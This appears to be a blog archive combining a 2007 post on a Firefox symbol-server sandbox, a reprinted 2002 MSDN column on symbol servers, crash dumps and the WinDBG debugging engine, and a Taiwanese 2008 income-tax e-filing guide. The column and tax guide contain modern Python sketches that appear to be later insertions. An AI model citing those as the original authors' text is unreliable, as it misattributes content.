20080512

9:32:00 PM

Setting up a Symbol Server Sandbox

September 29, 2007 by Lukas Blakk

After today’s IRC chat with luser, I now have a list of things to do in order to achieve 0.1:

set up a localhost server
make buildsymbols from my own build
load those symbols onto the local server
connect them up to my debugger to make sure it all works
get the Microsoft scripts working to add source code to my local PDB files
so that the debugger can access the source code when it is pointed at my server

Starting off, I set up IIS on my computer so that I can have a localhost webserver. This was a bit tricky with some unexpected authentication issues but I think that I have it working now. If I point my browser to http://localhost/symbolServer/ I have a directory of the pdb files that I created by calling make buildsymbols in my objdir.

The next move was to point my debugger (Visual Studio 2005) to the localhost symbol server. However, this is where I got stuck. I could load the Microsoft symbols, but it would skip right over my Firefox ones.

So I’m going back to square one. I’m rebuilding with debug disabled because that may be part of the issue. If this doesn’t work, I need to look into either a) the symbol server directory structure, because maybe I’m missing something about the hierarchy, or b) whether my IIS authentication issues are preventing Visual Studio from accessing the symbols.

Of course, in the back of my head I know it could also be c) something else entirely.

Back to the building.

--------------------------------divider------------------------------------------------------------

From the June 2002 issue of MSDN Magazine.

Symbols and Crash Dumps

Download the code for this article: Bugslayer0206.exe (671KB)

I don't know about you, but in my day job I'm bouncing back and forth so much between .NET and Win32® that my head is spinning. In this month's installment of Bugslayer, I want to discuss some very cool advances that Microsoft® has developed to make debugging your Win32-based applications easier. Anything you can do to stamp out those Win32 bugs faster means you can spend more time playing with your XML Web Services!
I'll start out this column by covering the hot new symbol server technology that will revolutionize how you deal with symbols and stack traces. After a tour of the symbol heaven, I'll discuss the new crash dump handling in Visual Studio® .NET as well as the new WinDBG so you can debug crashes after the fact just as if you were there. The last part of the column will be devoted to a utility that will quickly pull the important information out of crash dumps so you don't even have to open them in the debuggers!

Symbol Servers

Getting the correct symbols lined up between your application and the operating system is the secret to debugging faster. You know what happens when you don't get them coordinated; you get that beautiful call stack that has exactly one item in it. The reason symbols are so vital is that the Frame Pointer Omission (FPO) data is included as part of the PDB file. While you might think you have it tough messing with symbols, imagine how hard the Windows® operating system developers' lives must be. Whereas you have an application you might think is pretty big, the operating system developers have the largest commercial application in the world. I know people on the operating system team at Microsoft and I've asked if they get any help from the users debugging their applications. They all have laughed and told me that they get as much help with the operating system as I got when I was writing developer tools for a living. In other words, none.
Of course, they have many more versions of the operating system running at any given time than you could ever imagine. During a development cycle they might have anywhere up to 10,000 different builds running around the world. If you think you have trouble getting symbols to match, you have nothing on them!
Developers at Microsoft realized they had to do something to make life easier for themselves as well as their customers. Thus was born Symbol Servers. The concept is simple: store all the symbols for all public builds in a known location and make the debuggers smarter so they load the correct symbols without any user interaction. The beauty is that the reality is nearly that simple as well! There are a few small issues, which I'll point out in this column, but with the Symbol Server properly set up, you'll never want for symbols again.
The first step towards symbol nirvana is to download the latest version of WinDBG from http://www.microsoft.com/ddk/debugging as the Symbol Server binaries are developed by the WinDBG team. You will want to check back for updated versions of WinDBG, as the team seems to be on a fairly quick release schedule and are releasing updated versions every few months. After installing WinDBG, add the installation directory to the master PATH environment variable. The two key binaries, SYMSRV.DLL and SYMSTORE.EXE, must be accessible to read from and write to your Symbol Servers.

Figure 1 SYMSRV

The Symbol Store itself is simply a database that happens to use the file system to find the files. Figure 1 shows a partial listing from Explorer of the tree for the Symbol Server on one of my computers. The root directory is WebSymbols, and each symbol file, such as ADVAPI32.PDB, is listed at the first level. Under each symbol file name is a directory that corresponds to the date/time stamp, signature, and other information necessary to completely recognize a particular version of that symbol file. Keep in mind that if you have multiple versions of a file such as ADVAPI32.PDB for different operating system builds, you'll have multiple directories under ADVAPI32.PDB for each unique version you have accessed. In the signature directory, you'll probably have the particular symbol file for that version. There are provisions for having special text files to point to other locations in the Symbol Store, but by following my recommendation, you'll have the actual symbol files.
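To make the layout concrete, here is a minimal Python sketch of how a path inside the store is composed: the symbol file name, then an identifier directory, then the file itself. The drive letter and the identifier string are hypothetical placeholders; the real identifier is derived by the tools from the date/time stamp, signature, and related data, and this sketch does not attempt to compute it.

```python
from pathlib import PureWindowsPath


def symbol_store_path(root, file_name, identifier):
    """Compose root / file name / identifier / file name, as described above."""
    return PureWindowsPath(root) / file_name / identifier / file_name


# "C:\WebSymbols" and "ABC123" are illustrative assumptions, not real values.
print(symbol_store_path(r"C:\WebSymbols", "ADVAPI32.PDB", "ABC123"))
```

Two versions of ADVAPI32.PDB would differ only in the identifier directory, which is why several can sit side by side in the same store.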
Actually creating your Symbol Server takes two excruciatingly difficult steps. First, create a folder on a server, give everyone on the development team read and write access, and make sure plenty of disk space is available. Second, share that folder with all developers. You'll probably want the server and share name to be something like \\Symbols\Symbols or something else easily remembered.
The absolute beauty of the Symbol Server reveals itself when you populate it with operating system symbols. If you've been a good bugslayer over the years, you are probably already installing the operating system symbols on your machine. That's always been a little frustrating as you probably have a few hot fixes installed and certain operating system symbols never include the hot fix symbols. The great news with Symbol Servers is that you can be guaranteed of always getting the right operating system symbols with no work whatsoever! This is a huge boon.
The magic here is that Microsoft has made the symbols for all released operating systems, from Windows NT® 4.0 through the latest beta release of Windows Server 2003, including all operating system hot fixes, ready for download. To experience the magic, you need to set your _NT_SYMBOL_PATH environment variable to SRV*\\Symbols\Symbols*http://msdl.microsoft.com/download/symbols. Please note that I am assuming that your symbol store will be on a server called \\Symbols in a shared folder called Symbols. If yours are different, just substitute your values.
When you next start debugging, the debuggers will see that _NT_SYMBOL_PATH is set, automatically start downloading the operating symbols from Microsoft over HTTP, and put them in your Symbol Store if the symbol file has not already been downloaded. Remember, the Symbol Server will only download the symbols it needs, not every single operating system symbol. That's why putting the Symbol Store in a shared directory is so important; if one of your teammates has already downloaded the symbol, you avoid a potentially long download.
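As a small illustration, the symbol path value is just three fields joined by asterisks: the SRV keyword, the local (shared) store, and the upstream HTTP location. The Python sketch below assembles it, assuming the \\Symbols\Symbols share name used in this column; the function name is hypothetical.

```python
def make_symbol_path(local_store, upstream_url):
    """Join the SRV keyword, the local store, and the upstream URL with '*'."""
    return f"SRV*{local_store}*{upstream_url}"


value = make_symbol_path(
    r"\\Symbols\Symbols",  # assumed share name; substitute your own
    "http://msdl.microsoft.com/download/symbols",
)
print(f"set _NT_SYMBOL_PATH={value}")
```

The printed line is what you would type at a command prompt before starting the debugger.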
That takes care of the appropriate operating system symbols, so let's turn to getting your product symbols into the Symbol Server. SYMSTORE.EXE is a command-line utility that lets you add to your Symbol Store whole directory trees that contain symbols. SYMSTORE.EXE has a number of command-line switches (see Figure 2).
The best way to use SYMSTORE.EXE is to have it automatically add your complete build tree at the end of a daily build or milestone build. You probably do not want to have developers adding their local builds unless you are really into chewing up tons of disk space. For example, the following command will store all PDB and binary files in your symbol store for all directories found under D:\BUILD\RELEASE, inclusive:

symstore add /r /f d:\build\release\*.* /s \\Symbols\Symbols /t "MyApp" /v "Build 632"

It's nice to have the binaries stored in your Symbol Store so your crash dumps can automatically line up the binaries, but you can eat up a lot of disk space doing that. If you only want to include the PDB files, you can use the following:

symstore add /r /f d:\build\release\*.PDB /s \\Symbols\Symbols /t "MyApp" /v "Build 632"
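If you want a build script to issue that command for you, something along these lines might do. This is only a sketch: it uses just the switches shown above (/r, /f, /s, /t, /v), the function name is hypothetical, and the paths are the example ones from this column.

```python
def symstore_add_command(source_glob, store, product, version, recursive=True):
    """Build the argument list for 'symstore add' using the switches shown above."""
    cmd = ["symstore", "add"]
    if recursive:
        cmd.append("/r")  # include all directories under the source path
    cmd += ["/f", source_glob, "/s", store, "/t", product, "/v", version]
    return cmd


cmd = symstore_add_command(
    r"d:\build\release\*.PDB", r"\\Symbols\Symbols", "MyApp", "Build 632"
)
print(cmd)
# On a machine with SYMSTORE.EXE on the PATH, a build script could then run:
#   import subprocess; subprocess.run(cmd, check=True)
```

Passing the arguments as a list avoids having to quote "Build 632" by hand.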

There's lots more to read about SYMSTORE.EXE and Symbol Servers in the WinDBG documentation under Symbols; what I have discussed here are the steps that I have found to work well for me. I've been amazed how well the Symbol Server works and have been able to debug much faster because I nearly always have perfect call stacks.

Crash Dumps

What's really fantastic about Symbol Servers is that both WinDBG and Visual Studio .NET will use them if you are reading crash dumps as well. Just in case you are coming from one of those other operating systems, crash dumps are what Microsoft calls the user mode dump of the process when it crashes. Dr. Watson, the default debugger, writes crash dumps if you check the Create Crash Dump button shown in Figure 3. As you can guess, crash dumps are almost the next best thing to sitting there watching the application crash.

Figure 3 Create Crash Dump

As most folks realize, WinDBG has been able to read and process crash dumps for quite a while. What might be news though is that Visual Studio .NET can also handle crash dumps perfectly. That's great, because the UI of WinDBG takes minimalism to a new level.
Handling a crash dump is quite easy in Visual Studio .NET, but getting one opened is a little confusing. Start with a fresh instance of Visual Studio .NET and select Open Solution from the File menu. In the File Open dialog, select the fifth item down in the Files of Type combo box, Dump Files (*.dmp; *.mdmp). Navigate to the directory with your crash dump file and open it. That will create a new solution which you'll need to save. To start viewing the crash dump, simply press one of the debugging keys such as F5 (Go) or F10 (Step). You'll see the message box pop up reporting the error and, if you have all the appropriate symbols and source, you'll be dropped right on the line where you had the crash. It's that simple!
Both debuggers can write out crash dumps at any point during debugging. I do this frequently when tracking down tough problems so I can quickly look at the various stages I saw when debugging. This saves huge amounts of time.
Writing a dump from Visual Studio .NET is as simple as clicking on the Debug menu while debugging and selecting the last item on the menu, Save Dump As. Visual Studio .NET can write out two types of crash dumps. The minidump contains module information, such as name and date/time stamp, and the call stacks of all the threads. Minidumps are very small, on the order of 3-10KB. A minidump with heap, on the other hand, writes out the same information but also writes out all the memory marked as allocated memory. This way you can look at what pointer variables point to. Minidumps with heap are quite a bit larger; for simple "Hello World!" programs they're on the order of 2.5MB.
In WinDBG, creating crash dumps is done with the .dump command. One additional feature of WinDBG's crash dumps is that the .dump /mh command also stores all the handle data for the process in the dump. With the !handle command you can then see the exact state of your handles right from the crash dump. This is invaluable for tracking down deadlocks.
You can even write out your own crash dumps at any time by calling the MiniDumpWriteDump API function from DBGHELP.DLL. Keep in mind that you must use the latest version of DBGHELP.DLL from the WinDBG installation in order for this function to work correctly. The only gotcha is that if you call MiniDumpWriteDump on yourself, your crash dump will start in the middle of MiniDumpWriteDump, which might mean you can't walk the stack back to your own code. Thus, BugslayerUtil.DLL contains a function called CreateCurrentProcessMiniDump that will properly wrap the call to MiniDumpWriteDump so you can get the best crash dumps possible just when you need them.

The Debugging Engine

While it's wonderful to have crash dumps, you always do the same thing when you load them up; you enumerate the threads so you can see where each one is. Since I am basically lazy, I wanted a tool that would just give me the information I always looked for so I didn't even have to start the debugger. I started poking through the docs looking for a way to read dump files and eventually ran across a mention that WinDBG is really a shell on top of a debugging engine. I figured if I could get the interface to that debugging engine, I could easily write a tool to dump the cool stuff. Hidden in the WinDBG installation is a node that says SDK, but is not set to install by default. I set it to "Will be installed on local hard drive" and got the header files and libraries for DBGENG.DLL, the debugger engine.

Figure 4 Setting Up the WinDBG SDK

If you look at Figure 4, which shows what you need to do to install the WinDBG SDK, you'll notice there's not an installation node for Documentation. What makes using DBGENG.DLL fun is that the only documentation is the comment section in the header file DBGENG.H. For the most part, the comments can get you going, but until there's full documentation, you are going to have to spend some time playing with parameters to figure out what some APIs expect (see Figure 5). Oddly, the interface looks as if it's all COM-based. While it uses interfaces, it does not use OLE32.DLL at all. Think of the API as pseudo-COM. It's also pseudo-COM in the sense that you get all the pain of reference counting, but none of the benefits of enumerators and the like.
Another issue with the interface is that it is essentially the internal interface to WinDBG. Some of the interfaces and methods return items in what is obviously internal WinDBG format. Additionally, the engine outputs lots of text messages that could make your application look just like the WinDBG Command window if you don't suppress it. All in all, the fact that there is a debugging engine more than makes up for the quirks in the interface. In Figure 5, I list only the most derived interfaces as it looks like the "2" interfaces are the latest and most complete. Since you can't call CoCreateXxx on the debugging engine interfaces, DBGENG.DLL exports two functions, DebugConnect and DebugCreate, to create the specific interfaces for you.
The best way to get started with the debugging engine is to compile and carefully step through the DUMPSTK sample included with the SDK installation. The only problem is that it doesn't work. DUMPSTK is supposed to dump the call stacks for a dump file. I nearly drove myself nuts wondering why the code did not work as expected.
The key method to get the debugging engine cranking is IDebugControl::WaitForEvent. Whenever DUMPSTK calls it, it always returns E_INVALIDARG. Since it only takes two unsigned longs, the flags to indicate what you are waiting on, such as the initial breakpoint, and the time to wait, I was completely confused. It slowly dawned on me that DBGENG.DLL was complaining that the image path and symbols path were not both set. I set the environment variable _NT_IMAGE_PATH, thinking it might get picked up, and all of a sudden IDebugControl::WaitForEvent started working. There's nothing like returning values that have no relationship at all to the actual error!
Once I got DUMPSTK limping along, it proved useful. It's small enough to get your head around but actually does something handy. Also, I recommend you spend some time reading the complete DBGENG.H header file. As you can see from the list in Figure 5, the information you might need to solve a problem with the debugging engine is scattered across multiple interfaces.
When I first started looking at the debugging engine, I could see all sorts of very cool debugging and analysis utilities that I would like to write when my commercial programs crash at the customer's site. The good news is that DBGENG.DLL is part of the Windows XP and Windows Server 2003 operating systems. To use it legally on Windows 2000, your customers must download the complete WinDBG package and install it on their machines.

The Crash Dump Information Dumper

Now that I've covered the debugging engine's interfaces, I want to describe the DMPINFO program I wrote. I have always wanted a program that could tell me the important information from a user mode crash dump. When I open a user mode crash dump in Visual Studio .NET and WinDBG, I always do the same operations, so I wanted to automate them. DMPINFO is also a much more complete sample on how to use the debugging engine's interfaces.
Using DMPINFO is trivial; just type DMPINFO in a command prompt followed by the user-mode crash dump file you want to dump. DMPINFO outputs the system information from the user-mode crash dump, the loaded modules in the crash dump, the registers of the crashing thread, a disassembly for the crashing thread, and the call stack with all local variables. If you want to see all threads, pass -a on the command line. You can also pass in the specific source paths, symbols paths, and image paths. When looking at the DMPINFO output, you might notice that module symbol types are reported as DIA (Debug Interface Access) even though you have PDB files. DBGENG.H defines the DIA symbol type and DIA appears to be the new symbol format for Visual Studio .NET. However, all PDB symbols are reported as DIA.
I wrote DMPINFO with release 4.00.0018.0 of DBGENG.DLL. There are two bugs in DBGENG.DLL that you might see from DMPINFO. The system information values don't look right and occasionally the locals are not displayed for a stack scope. If you are running a debug build of DMPINFO, you will see an assertion message box. For some reason, DBGENG.DLL stops calling the IDebugOutputCallbacks interface so DMPINFO can't display locals. I'll discuss this problem in more detail later.
It actually took me quite a while to write DMPINFO because I had to spend so much time in trial and error development. The documentation is not bad in DBGENG.H; it's just not complete. Consequently, I had to try passing different parameters in all the time to get the results I wanted. You will see more assertions in DMPINFO.CPP than in any program you have ever seen because I needed to know instantly when something failed.
The first issue I ran into was that the debugging engine spews quite a bit of output, which gets in the way. I set up my own interface, IBetterDebugOutputCallbacks, derived from IDebugOutputCallbacks, so that I could filter out the debugging engine output that I didn't want to see. You can see the work in OUTPUT.H and OUTPUT.CPP available from my downloadable source sample. Fortunately, the output all seems to occur when you load a crash dump, so I could just turn off output until I was finished getting everything loaded. Use the -v command line switch on DMPINFO's command line in order to see all output.
The next issue I ran into was that there does not seem to be a way to determine programmatically whether loaded symbols are mismatched with the binary. The debugging engine outputs the mismatch when you load the crash dump, so the engine clearly knows about it. I hope that Microsoft will add a method to IDebugSymbols or a new field to the DEBUG_MODULE_PARAMETERS structure so you can find the mismatches.
My goal for DMPINFO was to show how to do all the work without using some of the easy methods of some of the interfaces. That way you would have a stronger sample and would have an idea how to apply the techniques yourself. When it came time for me to do the disassembly part of DMPINFO, I have to admit I wimped out. It's impossible to disassemble backwards in IA32 assembly language because the instructions are variable length, so I was not looking forward to grinding through an algorithm to get everything lined up so I could show 15 instructions before the instruction pointer. The output from IDebugControl->OutputDisassemblyLines wasn't what I wanted because I couldn't stick in a little pointer prefix to indicate the instruction pointer. The output is just a blob of text. However, OutputDisassemblyLines will do all the work to find the instruction starts in the disassembly and return them as an array. When I saw that OutputDisassemblyLines would do the work for me, I punted! I turned off output, called OutputDisassemblyLines so I could get the offsets of all the instruction starts, then called IDebugControl->Disassemble so I could format the lines as I wanted.
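The formatting half of that trick is simple once the instruction starts are known. The Python sketch below is not DMPINFO's code and does not call the debugging engine; it assumes you already hold a sorted list of instruction start offsets (hypothetical values here) and shows how to pick the instructions leading up to the instruction pointer and mark it with a prefix.

```python
def disassembly_window(starts, ip, before=15):
    """Return (offset, prefix) pairs for up to `before` instructions ahead of
    `ip`, followed by the instruction at `ip` itself, which gets the marker."""
    idx = starts.index(ip)  # raises ValueError if ip is not an instruction start
    first = max(0, idx - before)
    return [(off, "=> " if off == ip else "   ") for off in starts[first:idx + 1]]


# Hypothetical offsets; instruction lengths vary, so the gaps are uneven.
starts = [0x401000, 0x401001, 0x401003, 0x401006, 0x40100B, 0x40100D]
for off, prefix in disassembly_window(starts, ip=0x40100B, before=3):
    print(f"{prefix}{off:08X}")
```

Each selected offset would then be handed to the disassembler one at a time so the line can be formatted however you like.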
I spent what seemed like forever wrestling with the final part of DMPINFO: getting the local symbols. The first problem was that I could not figure out how to get the local symbols loaded after I set the scope. After calling IDebugSymbols->SetScope, I could see that I needed to call IDebugSymbols->GetScopeSymbolGroup. When I called IDebugSymbolGroup->GetNumberSymbols, I always got back that there were zero symbols. After nearly giving up, I finally asked Microsoft how to get local symbols. You have to pass the "*" string to IDebugSymbolGroup->AddSymbols to get the locals loaded into the IDebugSymbolGroup. You can take a look at all of this in action in the OutputScopeSymbols function in DMPINFO.CPP.
Once I got the locals loaded, I thought I was on my way. That's when I ran into the biggest problem of the current IDebugSymbolGroup interface: there's no way to enumerate local symbol values! You can call IDebugSymbolGroup->GetSymbolName to get the name of a symbol index. What's missing are two methods, GetSymbolType and GetSymbolValue. You can get the type in a roundabout way by calling IDebugSymbolGroup->GetSymbolParameters to get the DEBUG_SYMBOL_PARAMETERS structure for a symbol. In there is a TypeId field which you can pass to IDebugSymbols->GetTypeName (notice it's a different interface). That's two thirds of the information, but it doesn't have the all-important value. I called IDebugSymbolGroup->OutputSymbols and that did output all the symbol information, but in this very strange format:

<name>**NAME**<value>**VALUE**<offset>**OFF**<type>**TYPE**

The debugging engine outputs all symbols in this format packed end-to-end in a giant string. I especially liked the fact that a common value "*" (think pointer) was used as a delimiter. Since there is no other way to get values, I had to trap the string and parse it up to show them. I certainly hope that future releases of the debugging engine will fix this oversight.
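To show what that parsing can look like, here is a minimal Python sketch, not the code from DMPINFO.CPP, that splits such a string into records with a regular expression. The sample symbols and values are invented for illustration. The non-greedy groups let a field end in asterisks (a pointer type, say) and still find the delimiter that follows, though a value that itself contained a delimiter such as **NAME** would still confuse it.

```python
import re

# One record: <name>**NAME**<value>**VALUE**<offset>**OFF**<type>**TYPE**
RECORD = re.compile(
    r"(.*?)\*\*NAME\*\*(.*?)\*\*VALUE\*\*(.*?)\*\*OFF\*\*(.*?)\*\*TYPE\*\*",
    re.DOTALL,
)


def parse_symbol_blob(blob):
    """Split the packed output string into one dict per symbol."""
    return [
        {"name": n, "value": v, "offset": o, "type": t}
        for n, v, o, t in RECORD.findall(blob)
    ]


# Invented sample data: two locals, the second with a pointer type.
blob = (
    "argc**NAME**2**VALUE**0012ff88**OFF**int**TYPE**"
    "argv**NAME**0x00340f80**VALUE**0012ff8c**OFF**char ****TYPE**"
)
for sym in parse_symbol_blob(blob):
    print(sym)
```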

Wrap Up

Getting a Symbol Server set up is so important I urge you to stop reading right now and get one set up for your organization! It will make your debugging life so much easier. Also, armed with the new crash dump handling in Visual Studio .NET and WinDBG, getting rid of bugs should be even easier. Finally, I hope I was able to help you get over some of the same hurdles I ran into when I started with DBGENG.DLL. While it might have a few quirks, it's still a work in progress and will only get better with time. I encourage you to think about the possibilities and start creating some of those debugging tools you've always wanted!

Da Tips!

The sweet smell of flowers in the spring should help you think of even more tips. Send your tips to me at john@wintellect.com.
Tip 53 If you have any really tough debugging problems, the new WinDBG documentation has a couple of excellent discussions in the Debugging Techniques section.
Tip 54 John Maver reports a cool trick with the Visual Studio .NET debugger. If you have a line like this

HeapFree ( GetProcessHeap ( ) , 0 , lpdwPIDs ) ;

and if you want to step into HeapFree, but not GetProcessHeap, put your cursor on HeapFree, right-click, and choose Step Into HeapFree. The text changes based on where you place your cursor. I like this one so much I assigned the shortcut Ctrl-Alt-F11 to it.

Send questions and comments for John to slayer@microsoft.com.

John Robbins is a cofounder of Wintellect, a software consulting, education, and development firm that specializes in programming in .NET and Windows. He is the author of Debugging Applications (Microsoft Press, 2000) and the upcoming Debugging .NET and Win32 Applications also from Microsoft Press. You can contact John at http://www.wintellect.com.

20080509

9:03:00 AM

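[Tax] Online Tax-Filing Software Download and a Guide to Filing Individual Consolidated Income Tax
http://payoversea.com/money/

1. Downloading the online tax-filing software:

May is tax-filing month every year.
The filing period normally runs from 5/1 to 5/31, so remember not to miss the deadline!
This year it is 97/05/01 ~ 97/06/02 (ROC year 97 is 2008).

△ Filing methods: online filing, mailing a completed paper return, or filing in person at the counter.

△ Online filing comes in two forms (suitable for those with a computer and Internet access):
1. GCA filing (with a GCA certificate you can also download your income data directly over the network, but applying for the GCA is a little more trouble)
2. National ID number + household registration number

Ministry of Finance electronic filing software download page:
http://tax.nat.gov.tw/irc/irc_download.html

Two versions are offered there: a network-install version and a download-and-install version.

PS.
If garbled characters appear when you install the online tax-filing software,
just go by habit, work out which button is Next, and keep clicking through until the installation finishes!

Once installation is complete, go to the directory below, find the file, and copy it to the desktop as a shortcut.
C:\Program Files\eTax\IRX\Bin\IrcWin.exe

△ Login methods for the online filing software:
1. Citizen Digital Certificate (natural-person IC card)
2. Financial certificate (online banking certificate, online securities-trading certificate, online insurance certificate)
3. National ID number + household registration number

(Those filing with method 1 or 2 can retrieve most of last year's personal tax data directly over the network, which saves typing it in!)

△ Financial certificates approved by the Ministry of Finance:

The announcement on the joint service website for online tax filing with financial certificates prevails: http://itax.twca.com.tw/index.asp

(1) Shin Kong Financial Holding, Mega International Commercial Bank, Land Bank of Taiwan, Taiwan Cooperative Bank, Chang Hwa Bank, First Commercial Bank
(2) Yuanta Core Pacific Securities, Jih Sun Securities, MasterLink Securities, President Securities, Capital Securities, Fubon Securities,
E.SUN Securities, Taiwan Securities, SinoPac Securities, Mega Securities, Oriental Securities, IBF Securities
(3) Nan Shan Life Insurance

△ Tax payment methods:
Credit card, cash, check, ATM transfer, or a completed tax-payment withdrawal authorization form.

△ Refund methods:
Refund by transfer to a financial-institution account, or refund by ordinary refund voucher.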

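2. Rules for filing individual income tax:

△ Filing options for married households: spouses filing separately, or filing with the husband or with the wife as the primary taxpayer. This year's filing methods are not much changed from previous years.

△ When you do not need to file:
See the table further below for the cases where filing is not required; this applies only when you are not due a refund.
(If you are entitled to a refund and do not file, you cannot get the refund...)

△ Personal exemption: NT$77,000 (aged 70 or over: NT$115,500)

△ General deduction (choose either standard or itemized):
a. Standard: NT$46,000 (married couple filing jointly: NT$92,000)
b. Itemized: donations, insurance premiums, medical and childbirth expenses, disaster losses, mortgage interest on an owner-occupied home, rent.

△ Special deductions:
1. Salary income: up to NT$78,000 per person
2. Property transaction losses: capped at the actual property transaction income
3. Savings and investment: up to NT$270,000
4. Disability: NT$77,000
5. Higher-education tuition: up to NT$25,000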

---------------

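3. Supplementary information:
Note: the following material is reproduced from the help file of the ROC year 96 consolidated income tax electronic filing and payment system!

Guide to Filing Consolidated Income Tax over the Internet

In recent years, as personal computers have become widespread, browsing the Internet has become an essential source of information (knowledge) and convenience between people, and filing taxes over the Internet has become one of the channels the public uses. Every year when the filing period arrives, the questions that trouble people most are roughly as follows:

Who should file a consolidated income tax return?

Anyone whose total consolidated income for the year (including the income of the taxpayer, spouse, and dependents) does not exceed the sum of the exemptions and the standard deduction (see the table below) is not required to file a return, except in cases 1 and 2 below, which must still file. Where the total income includes salary income, the special deduction for salary income may also be subtracted; for a taxpayer, spouse, or dependent lineal ascendant aged 70 or over, a further NT$38,500 of personal exemption may be subtracted for each.
1. Those who have withheld tax or imputation tax credits that are refundable by law must file in order to receive the refund.
2. Those required to file an individual basic income tax return under the Income Basic Tax Act must complete the "Individual Basic Income Tax Return" and file it together with the regular return.

Filing-exempt threshold (NT$) by number of dependents
Dependents      0         1         2         3         4         5
No spouse       123,000   200,000   277,000   354,000   431,000   508,000
With spouse     246,000   323,000   400,000   477,000   554,000   631,000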
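The figures in the table above appear to be one NT$77,000 exemption per person in the household plus the standard deduction (NT$46,000 for a single filer, NT$92,000 with a spouse). That reading is an inference from the numbers rather than something the help file states outright, and the Python sketch below simply reproduces the table under that assumption. It ignores the salary special deduction and the extra exemption for people aged 70 or over.

```python
EXEMPTION = 77_000                    # per person
STANDARD_DEDUCTION_SINGLE = 46_000
STANDARD_DEDUCTION_MARRIED = 92_000


def filing_threshold(dependents, has_spouse):
    """Income at or below this amount does not require filing (see caveats above)."""
    people = 1 + (1 if has_spouse else 0) + dependents
    deduction = STANDARD_DEDUCTION_MARRIED if has_spouse else STANDARD_DEDUCTION_SINGLE
    return people * EXEMPTION + deduction


for spouse in (False, True):
    print([filing_threshold(n, spouse) for n in range(6)])
```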

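The assessment of income for practitioners of a profession is more complicated. If no return is filed and income from professional practice is assessed under the revenue and expense standards issued by the Ministry of Finance, then in addition to the tax due, a penalty will be imposed under Article 110 of the Income Tax Act. To protect your legal rights, please be sure to file a return.
When should I file?

You may file from May 1, ROC year 97 through June 2, ROC year 97 (the statutory filing deadline of May 31 falls on a weekend, so it is extended to June 2). Please file early to avoid the queues and crowds of the last few days.

Where do I file?

You may file at any nearby National Tax Administration office; or send the return by registered mail directly to the National Tax Administration office for your place of household registration; or file over the Internet (http://tax.nat.gov.tw). Late filers, however, may file only with the National Tax Administration office for their place of household registration. Where an Internet filing requires other supporting documents or receipts, these must be delivered (or mailed) by June 12, ROC year 97 directly to the National Tax Administration office for the place of household registration, or handed in at any nearby branch, tax collection office, or service office of a National Tax Administration for forwarding.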

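Dependents

Dependent data maintenance.
What is an exemption?

The taxpayer, spouse, and claimed dependent lineal ascendants aged 70 or over [born in ROC year 26 or earlier] each receive an exemption of NT$115,500; other claimed dependents, and a taxpayer or spouse under 70, each receive an exemption of NT$77,000. Those who married or divorced in ROC year 96 may choose to file jointly or separately. If the couple is separated and cannot file jointly, the spouse's name and national ID number must still be entered on the return, with the word "separated" noted.

What is a dependent?

A relative claimed as a dependent by the taxpayer or spouse must meet one of the following conditions:

Lineal ascendants aged 60 or over, or under 60 but unable to earn a living, who are supported by the taxpayer (appropriate proof of inability to earn a living must be attached). Where two or more siblings jointly support a lineal ascendant, the siblings should agree on one of them to claim the dependent; please do not claim the same person twice.
Children under 20 [born in ROC year 77 or later; even if they have income they may not file separately, unless married], or aged 20 or over who are supported by the taxpayer because they are in school, physically or mentally disabled, or unable to earn a living (proof of enrollment, a physician's certificate, or similar must be attached). Those born in ROC year 76 may choose to file separately or jointly with the person supporting them.
Siblings under 20, or aged 20 or over who are supported by the taxpayer because they are in school, physically or mentally disabled, or unable to earn a living (proof of enrollment, a physician's certificate, or similar must be attached).
Other relatives or family members of the taxpayer (such as paternal uncles, nephews and nieces, grandchildren, and maternal uncles) who fall under Article 1114, Subparagraph 4 of the Civil Code (between the head and the members of a household) and Article 1123, Paragraph 3 (persons who, though not relatives, live together in one household with the purpose of permanent cohabitation are deemed family members), who are under 20 or are 60 or over and unable to earn a living (a physician's certificate or other appropriate proof must be attached), and who are genuinely supported by the taxpayer. However, if the dependent's father or mother is an active-duty serviceman or a teacher or staff member of a nursery, kindergarten, or public or private elementary or junior high school, the dependent may not be claimed (appropriate proof that the dependent's parents are not among these tax-exempt persons must be attached; see Note (1)). When claiming other relatives or family members as dependents, the following documents must be attached for review by the tax authority:
(1) Where the taxpayer and the other relative or family member living in one household with the purpose of permanent cohabitation share the same household registration: a photocopy of the household registration booklet or of the ID card, or other appropriate proof.
(2) Where the taxpayer and the other relative or family member living in one household with the purpose of permanent cohabitation do not share the same household registration: a signed declaration by the dependent or the dependent's guardian stating that the dependent is in fact supported by the taxpayer, or other appropriate proof.

Notes:

(1) You may attach a certificate of employment issued by the employer of the dependent's parents, a salary withholding statement, a National Health Insurance premium receipt issued by the insuring unit, or other appropriate proof.
(2) Proof of enrollment may be the current year's tuition receipt, a photocopy of both sides of the student ID, a photocopy of the diploma, or a certificate of enrollment; study abroad or attendance at a military academy is handled the same way.
(3) Where the taxpayer's spouse or dependent is an overseas Chinese or foreign national without a national ID card, fill in the national ID number field with the uniform ID number shown on the resident certificate. If the resident certificate has no uniform ID number field, or the person holds no resident certificate, enter the date of birth in the Western calendar followed by the first two letters of the first word of the English name. (Example: name Carol Lee, born October 24, 1978, is entered as 19781024CA.) When filing, attach documents sufficient to prove the family relationship and the fact of support, for verification by the tax authority.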
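The substitute identifier described in the last note is easy to compute by hand, but a short Python sketch makes the rule unambiguous. The function name is hypothetical; the rule (Western birth date as YYYYMMDD plus the first two letters of the first word of the English name) and the Carol Lee example come from the note itself. Uppercasing the letters is an assumption based on that example.

```python
from datetime import date


def substitute_id(english_name, birth):
    """Birth date as YYYYMMDD followed by the first two letters of the first name word."""
    first_word = english_name.split()[0]
    return birth.strftime("%Y%m%d") + first_word[:2].upper()


print(substitute_id("Carol Lee", date(1978, 10, 24)))  # 19781024CA, as in the note
```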

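Income Data

Income data maintenance.
How is net consolidated income calculated?

Net consolidated income is what remains of total consolidated income after subtracting exemptions and deductions.

What is total consolidated income?
It is the sum of the following categories of income received by the taxpayer, spouse, and claimed dependents: business profit income, income from professional practice, salary income, interest income, rental income and royalty income, income from self-employed farming, fishing, animal husbandry, forestry, and mining, property transaction income, prizes and awards from contests, competitions, and games of chance, retirement income, other income, and so on.

What is business profit income?
It includes:

Dividends or profits distributed by a company or cooperative that belong to ROC year 86 or earlier. (Fill in according to the withholding (non-withholding) statement.)
Total dividends or total profits distributed by a company or cooperative that belong to ROC year 87 or later. (Fill in according to the dividend statement.)
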